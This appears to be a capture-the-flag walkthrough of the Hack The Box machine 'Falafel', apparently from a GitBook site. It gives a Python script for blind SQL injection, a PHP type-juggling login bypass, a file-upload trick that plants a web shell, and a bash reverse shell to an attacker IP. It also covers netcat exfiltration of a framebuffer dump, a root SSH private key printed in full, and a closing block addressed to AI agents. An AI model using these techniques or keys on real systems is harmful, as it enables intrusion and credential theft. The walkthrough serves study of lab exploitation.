# Falafel

## Enumeration As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.73 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. {% code overflow="wrap" %} ```bash # Nmap 7.93 scan initiated Tue Nov 15 18:23:28 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.73 Nmap scan report for 10.10.10.73 Host is up (0.065s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http # Nmap done at Tue Nov 15 18:23:42 2022 -- 1 IP address (1 host up) scanned in 13.47 seconds ``` {% endcode %} Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file: > nmap -sC -sV -p22,80 10.10.10.73 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. {% code overflow="wrap" %} ```bash # Nmap 7.93 scan initiated Tue Nov 15 18:23:59 2022 as: nmap -sCV -p22,80 -oN targeted 10.10.10.73 Nmap scan report for 10.10.10.73 Host is up (0.037s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 36c00a2643f8cea82c0d192110a6a8e7 (RSA) | 256 cb20fdffa880f2a24b2bbbe17698d0fb (ECDSA) |_ 256 c4792bb6a9b7174c0740f3e57c1ae9dd (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/*.txt |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Falafel Lovers Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Nov 15 18:24:37 2022 -- 1 IP address (1 host up) scanned in 38.60 seconds ``` {% endcode %} There is just a welcome message in the website.

The `robots.txt` file contains the disallow entry `/*.txt`.

Let's try to list any subdirectories or any `.txt` and `.php` files hidden in the website. > gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error -x txt,php * `dir` enumerates **directories or files**. * `-u` the **target** URL. * `-w` path to the **wordlist**. * `-t` number of current **threads**, in this case 200 threads. ``` =============================================================== Gobuster v3.2.0-dev by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.73/ [+] Method: GET [+] Threads: 200 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.2.0-dev [+] Extensions: php,txt [+] Timeout: 10s =============================================================== 2022/11/16 22:53:21 Starting gobuster in directory enumeration mode =============================================================== /profile.php (Status: 302) [Size: 9787] [--> login.php] /images (Status: 301) [Size: 311] [--> http://10.10.10.73/images/] /uploads (Status: 301) [Size: 312] [--> http://10.10.10.73/uploads/] /header.php (Status: 200) [Size: 288] /assets (Status: 301) [Size: 311] [--> http://10.10.10.73/assets/] /footer.php (Status: 200) [Size: 0] /upload.php (Status: 302) [Size: 0] [--> profile.php] /css (Status: 301) [Size: 308] [--> http://10.10.10.73/css/] /style.php (Status: 200) [Size: 6174] /js (Status: 301) [Size: 307] [--> http://10.10.10.73/js/] /logout.php (Status: 302) [Size: 0] [--> login.php] /robots.txt (Status: 200) [Size: 30] /cyberlaw.txt (Status: 200) [Size: 804] /connection.php (Status: 200) [Size: 0] /.php (Status: 403) [Size: 290] =============================================================== 2022/11/16 22:55:28 Finished =============================================================== ``` The `/cyberlaw.txt` file is says that there is a way to log in to the site as the `admin` user. Also, get into the server using the image upload feature.

## Exploitation If we try to log in as the `admin` user with random credentials, we'll get the error `Wrong identification : admin`.

But, if we try to log in as some random user, we will get the error `Try again..`.

If we try to log in with an SQL injection payload, we'll get the error `Wrong identification : admin`. Which means that the query is valid. > ' or 1=1-- -

We can't bypass the login page, but we can run SQL queries, and as if the error is `Wrong identification : admin`. the query is true, and if the error is `Try again..` the query is false, we will have to exploit a *Boolean SQL Injection*. if we start enumerating the database with the UNION statement as usual, we'll get the error `Hacking Attempt Detected!`. > ' union select 1-- -

But there are other ways of enumerating a database. The following query will check if the first letter of admin is an a. As the comparison is true we should get the error `Wrong identification : admin`. > admin' and substring(username,1,1)='a'-- -

I made the following script in python which will guess all the characters of the password hash stored in the database following the previous logic. ```python #/usr/bin/env python from pwn import * import requests def def_handler(sig, frame): print("[!] Quiting...") sys.exit(1) #Ctrl+C signal.signal(signal.SIGINT, def_handler) # Variables url = "http://10.10.10.73/login.php" def makeRequest(): characters = '0123456789abcdefghijklmnopqrstuvwxyz' username = "admin" password = "" counter = 1 p1 = log.progress("Brute Force") p1.status("Brute forcing...") time.sleep(1) p2 = log.progress("Password hash: ") while True: for char in characters: p1.status("Trying with the %c character" % char) post_data = { "username": username + f"' and substring(password,{counter},1)='{char}' -- -", "password": "test", } r = requests.post(url, post_data, allow_redirects=False) if "identification" in r.text: password += char counter += 1 p2.status(password) break if __name__ == '__main__': makeRequest() ``` If we run the script, we'll see that the password hash for the admin user is `0e462096931906507119562988736854`. > python script.py ``` [....\...] Brute Force: Trying with the 2 character [d] Password hash: : 0e462096931906507119562988736854 ``` But we can't break the hash and it is not available in any rainbow table.

But, if you remember in the `/cyberlaw.txt` there was another user called `chris`. Let's try to get his password hash. Make sure to change the `username` to `chris`. > python script.py ``` [O] Brute Force: Trying with the 0 character [o] Password hash: : d4ee02a22fc872e36d9e3751ba72ddc8 ``` We got a new hash, and this time it is available in the rainbow tables.

Let's log in as the `chris` user.

The welcome message is putting a lot of emphasis on juggling. Maybe we have to exploit a `Type Juggling` attack. If the login page is vulnerable to this vulnerability, the page will compare the hash of the admin user with the *md5* hash of our password input using the `==` comparison. As the admin password hash start with `0e`, which means and exponential of 0, which is equal to 0. > php --interactive > > php > if ("0e462096931906507119562988736854" == 0) { echo "equal"; } else { echo "not equal"; } ``` equal ``` So if we log in with a password, whose hash start with `0e` and the rest of the hash are numbers, the result of the exponential will also be 0 as the hash of the `admin` user, and we'll be able to log in a `admin`. This [article](https://news.ycombinator.com/item?id=9484757) show a few strings whose hashes are the ones we are looking for. Let's log in with the password `240610708`.

Now we are logged in as `admin`.

Now, there might be a way to get access to the server with this upload feature. Let's do a test. First, set a simple HTTP server with python. > python -m http.server 80 Now, create a file called `test.png`. > touch test.png Now, click on `Upload`, then intercept the request with *BurpSuite*, and send it to the *Repeater*. Then, send a request with the following value as the `url` parameter.

As you can see, the file got downloaded. The server is storing the file inside a random directory. We could try to upload `.php` files. > touch test.php

But we are not allowed to do that. On linux, the filenames can't be longer than 255 bytes. So what happens if we try to upload a file whose name is 255 bytes long. Let's check it out. First, let's create a patter of 251 bytes, as we do in buffer overflows. > msf-pattern\_create {% code overflow="wrap" %} ``` Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai ``` {% endcode %} Now, create a file called like the pattern with the `.png` extension, so it has 255 bytes, and we are able to upload it. > touch Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai.png Now, upload it to the website.

As we can see, we were able to upload the file, but the filename got shortened. There must be some kind of job shortening the filenames in case they are too long. Something we can do is check what is the exact offset of bytes that we can upload, and then upload a file with `offset-4` characters, and then the `.php.png` extension, so we can upload the file. This way the shorten job will cut of the `.png` part, and we'll be able to upload a `.php` file with some malicious code. First, calculate the offset. As you can see, the last 4 characters of the shortened file are `Ah7A`. > echo -n "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah" | wc -c ``` 236 ``` Now, create a new patter with `236-4` characters. > msf-pattern\_create -l 232 {% code overflow="wrap" %} ``` Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A ``` {% endcode %} Create a file with that name and the .php.png extension. Write some malicious code on the file. > nano Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A.php.png ```php ``` If we upload the file, we'll see that the server cut off the `.png` part, and it stored a `.php` file in the `/uploads/1117-2156_6e68af9e0ef8c74a` directory.

Now, if we access the PHP file, we'll be able to run commands using the cmd parameter. > curl "" ``` www-data ``` Let's get a reverse shell. First, set a netcat listener on port *4444* with *netcat*. > nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Now, send the reverse shell. > curl "[http://10.10.10.73/uploads/1117-2156\\\_6e68af9e0ef8c74a/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A.php?cmd=bash%20-c%20'bash%20-i%20>%26%20/dev/tcp/10.10.14.14/4444%200>%261](http://10.10.10.73/uploads/1117-2156\\_6e68af9e0ef8c74a/Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6A.php?cmd=bash%20-c%20'bash%20-i%20>%26%20/dev/tcp/10.10.14.14/4444%200>%261)'" ``` Listening on 0.0.0.0 4444 Connection received on 10.10.10.73 50354 bash: cannot set terminal process group (1303): Inappropriate ioctl for device bash: no job control in this shell www-data@falafel:/var/www/html/uploads/1117-2156_6e68af9e0ef8c74a$ whoami whoami www-data ``` ## Privilege Escalation First, let's set an interactive *TTY* shell. > script /dev/null -c /bin/bash Then I press `Ctrl+Z` and execute the following command on my local machine: > stty raw -echo; fg > > reset > > Terminal type? xterm Next, I export a few variables: > export TERM=xterm > > export SHELL=bash Finally, I run the following command in our local machine: > stty size ``` 51 236 ``` And set the proper dimensions in the victim machine: > stty rows 51 columns 236 Let's check the system users. > grep sh /etc/passwd ``` root:x:0:0:root:/root:/bin/bash sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash yossi:x:1000:1000:Yossi,,,:/home/yossi:/bin/bash moshe:x:1001:1001::/home/moshe: ``` If we check the `/var/www/html` directory, we'll see a file called `connection.php`. > ls -la /var/www/html ``` total 92 drwxr-x--- 7 root www-data 4096 Sep 13 18:51 . drwxr-xr-x 3 root root 4096 Sep 13 18:51 .. -rwxr-xr-- 1 root www-data 41 Oct 29 2017 .htaccess drwxr-xr-- 2 root www-data 4096 Oct 29 2017 assets -rwxr-xr-- 1 root www-data 423 Oct 29 2017 authorized.php -rwxr-xr-- 1 root www-data 377 Nov 28 2017 connection.php drwxr-xr-- 2 root www-data 4096 Nov 28 2017 css -rwxr-xr-- 1 root www-data 804 Nov 27 2017 cyberlaw.txt -rwxr-xr-- 1 root www-data 0 Nov 27 2017 footer.php -rwxr-xr-- 1 root www-data 1140 Nov 27 2017 header.php -rwxr-xr-- 1 root www-data 7335 Aug 13 2015 icon.png drwxr-xr-- 2 root www-data 4096 Nov 27 2017 images -rwxr-xr-- 1 root www-data 818 Nov 28 2017 index.php drwxr-xr-- 2 root www-data 4096 Nov 28 2017 js -rwxr-xr-- 1 root www-data 752 Oct 29 2017 login.php -rwxr-xr-- 1 root www-data 1800 Nov 28 2017 login_logic.php -rwxr-xr-- 1 root www-data 107 Oct 29 2017 logout.php -rwxr-xr-- 1 root www-data 1913 Nov 28 2017 profile.php -rwxr-xr-- 1 root www-data 30 Nov 28 2017 robots.txt -rwxr-xr-- 1 root www-data 6174 Nov 28 2017 style.php -rwxr-xr-- 1 root www-data 3647 Nov 28 2017 upload.php drwxrwxr-- 10 root www-data 4096 Nov 17 21:56 uploads ``` That file contains credentials for the *MySQL* database. > cat /var/www/html/connection.php ```php ``` And it looks like that password is valid for the moshe user. Then, we can grab the user flag. > su moshe ``` Password: falafelIsReallyTasty setterm: terminal xterm does not support --blank moshe@falafel:/var/www/html/uploads/1117-2156_6e68af9e0ef8c74a$ whoami moshe moshe@falafel:/var/www/html/uploads/1117-2156_6e68af9e0ef8c74a$ cd moshe@falafel:~$ cat user.txt 1a203d14a3460277a12d5b33b0c734d5 ``` By checking what groups is `moshe` a member, we'll see he is member of the `video` group. > id {% code overflow="wrap" %} ``` uid=1001(moshe) gid=1001(moshe) groups=1001(moshe),4(adm),8(mail),9(news),22(voice),25(floppy),29(audio),44(video),60(games) ``` {% endcode %} Someone that is a member of the `video` group could be able to take screenshots. First, we'll need to find the proper virtual device. > find / -group video 2>/dev/null ``` /dev/fb0 /dev/dri/card0 /dev/dri/renderD128 /dev/dri/controlD64 ``` Now, copy the `/dev/fb0` file into the `/tmp` directory. > cp /dev/fb0 /tmp/ Let's transfer that file to our local machine. Set a `netcat` listener on port `5555`, pointing to `fb0.raw`. > nc -lvnp 5555 > fb0.raw Then, on the `falafel` machine, send the file with `netcat`. > nc 10.10.14.14 5555 < fb0 Now, we need to know the proper dimensions of the screen of the victim machine. > echo "Width:"; cat /sys/class/graphics/fb0/virtual\_size | cut -d, -f1; echo " Heigth:"; cat /sys/class/graphics/fb0/virtual\_size | cut -d, -f2 ``` Width: 1176 Heigth: 885 ``` On our local machine, create the video.pl script with the following code. > nano video.pl ```perl #!/usr/bin/perl -w $w = shift || 240; $h = shift || 320; $pixels = $w * $h; open OUT, "|pnmtopng" or die "Can't pipe pnmtopng: $!\n"; printf OUT "P6%d %d\n255\n", $w, $h; while ((read STDIN, $raw, 2) and $pixels--) { $short = unpack('S', $raw); print OUT pack("C3", ($short & 0xf800) >> 8, ($short & 0x7e0) >> 3, ($short & 0x1f) << 3); } close OUT; ``` Finally, let's run the script with the width and heigth as parameters. > perl video.pl 1176 885 < fb0.raw > fb0.png If we take a look at the `fb0.png` screenshot, we'll see that the user `yossi` is changing his password to `MoshePlzStopHackingMe!`.

Let's become the `yossi` user. > su yossi ``` Password: MoshePlzStopHackingMe! yossi@falafel:/tmp$ whoami yossi ``` If we check the `yossi` groups, we'll see that he is member of the `disk` group. > id {% code overflow="wrap" %} ``` uid=1000(yossi) gid=1000(yossi) groups=1000(yossi),4(adm),6(disk),24(cdrom),30(dip),46(plugdev),117(lpadmin),118(sambashare) ``` {% endcode %} As we are in the `disk` group, we can read all the hard drives devices. > fdisk -l ``` Disk /dev/sda: 4 GiB, 4294967296 bytes, 8388608 sectors Units: sectors of 1 * 512 = 512 bytes Sector size (logical/physical): 512 bytes / 512 bytes I/O size (minimum/optimal): 512 bytes / 512 bytes Disklabel type: dos Disk identifier: 0x2aa34854 Device Boot Start End Sectors Size Id Type /dev/sda1 2048 7337983 7335936 3.5G 83 Linux /dev/sda2 7337984 8388607 1050624 513M 5 Extended /dev/sda5 7340032 8388607 1048576 512M 82 Linux swap / Solaris ``` It looks like the filesystem is stored in `/dev/sda1`. Let's take a look at it. > debugfs /dev/sda1 > > debugfs: ls ``` 2 (12) . 2 (12) .. 11 (20) lost+found 131073 (12) etc 31 (16) media 131075 (12) bin 426 (12) boot 2091 (12) dev 12 (12) home 13 (12) lib 2451 (16) lib64 2453 (12) mnt 2454 (12) opt 2455 (12) proc 2456 (12) root 2459 (12) run 2472 (12) sbin 2589 (12) srv 2590 (12) sys 2591 (12) tmp 2592 (12) usr 131762 (12) var 24441 (20) initrd.img 24442 (40) vmlinuz 145141 (3756) snap ``` As we are able to use the entire file system, we could grab the `id_rsa` file of the `root` user. > debugfs: cat /root/.ssh/id\_rsa ``` -----BEGIN RSA PRIVATE KEY----- MIIEpAIBAAKCAQEAyPdlQuyVr/L4xXiDVK8lTn88k4zVEEfiRVQ1AWxQPOHY7q0h b+Zd6WPVczObUnC+TaElpDXhf3gjLvjXvn7qGuZekNdB1aoWt5IKT90yz9vUx/gf v22+b8XdCdzyXpJW0fAmEN+m5DAETxHDzPdNfpswwYpDX0gqLCZIuMC7Z8D8Wpkg BWQ5RfpdFDWvIexRDfwj/Dx+tiIPGcYtkpQ/UihaDgF0gwj912Zc1N5+0sILX/Qd UQ+ZywP/qj1FI+ki/kJcYsW/5JZcG20xS0QgNvUBGpr+MGh2urh4angLcqu5b/ZV dmoHaOx/UOrNywkp486/SQtn30Er7SlM29/8PQIDAQABAoIBAQCGd5qmw/yIZU/1 eWSOpj6VHmee5q2tnhuVffmVgS7S/d8UHH3yDLcrseQhmBdGey+qa7fu/ypqCy2n gVOCIBNuelQuIAnp+EwI+kuyEnSsRhBC2RANG1ZAHal/rvnxM4OqJ0ChK7TUnBhV +7IClDqjCx39chEQUQ3+yoMAM91xVqztgWvl85Hh22IQgFnIu/ghav8Iqps/tuZ0 /YE1+vOouJPD894UEUH5+Bj+EvBJ8+pyXUCt7FQiidWQbSlfNLUWNdlBpwabk6Td OnO+rf/vtYg+RQC+Y7zUpyLONYP+9S6WvJ/lqszXrYKRtlQg+8Pf7yhcOz/n7G08 kta/3DH1AoGBAO0itIeAiaeXTw5dmdza5xIDsx/c3DU+yi+6hDnV1KMTe3zK/yjG UBLnBo6FpAJr0w0XNALbnm2RToX7OfqpVeQsAsHZTSfmo4fbQMY7nWMvSuXZV3lG ahkTSKUnpk2/EVRQriFjlXuvBoBh0qLVhZIKqZBaavU6iaplPVz72VvLAoGBANj0 GcJ34ozu/XuhlXNVlm5ZQqHxHkiZrOU9aM7umQkGeM9vNFOwWYl6l9g4qMq7ArMr 5SmT+XoWQtK9dSHVNXr4XWRaH6aow/oazY05W/BgXRMxolVSHdNE23xuX9dlwMPB f/y3ZeVpbREroPOx9rZpYiE76W1gZ67H6TV0HJcXAoGBAOdgCnd/8lAkcY2ZxIva xsUr+PWo4O/O8SY6vdNUkWIAm2e7BdX6EZ0v75TWTp3SKR5HuobjVKSht9VAuGSc HuNAEfykkwTQpFTlmEETX9CsD09PjmsVSmZnC2Wh10FaoYT8J7sKWItSzmwrhoM9 BVPmtWXU4zGdST+KAqKcVYubAoGAHR5GBs/IXFoHM3ywblZiZlUcmFegVOYrSmk/ k+Z6K7fupwip4UGeAtGtZ5vTK8KFzj5p93ag2T37ogVDn1LaZrLG9h0Sem/UPdEz HW1BZbXJSDY1L3ZiAmUPgFfgDSze/mcOIoEK8AuCU/ejFpIgJsNmJEfCQKfbwp2a M05uN+kCgYBq8iNfzNHK3qY+iaQNISQ657Qz0sPoMrzQ6gAmTNjNfWpU8tEHqrCP NZTQDYCA31J/gKIl2BT8+ywQL50avvbxcXZEsy14ExVnaTpPQ9m2INlxz97YLxjZ FEUbkAlzcvN/S3LJiFbnkQ7uJ0nPj4oPw1XBcmsQoBwPFOcCEvHSrg== -----END RSA PRIVATE KEY----- ``` Copy the key to our local machine, give the file a 600 permission, and log in as root to the machine. Then, all we have to do is reap the harvest and take the root flag. > nano id\_rsa > > chmod 600 > > ssh -i id\_rsa root\@10.10.10.73 ``` Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 0 packages can be updated. 0 updates are security updates. Last login: Tue May 1 20:14:09 2018 from 10.10.14.4 root@falafel:~# whoami root root@falafel:~# cat root.txt 8acbf5e11783a28dd4d136164916c7cb ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/falafel.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.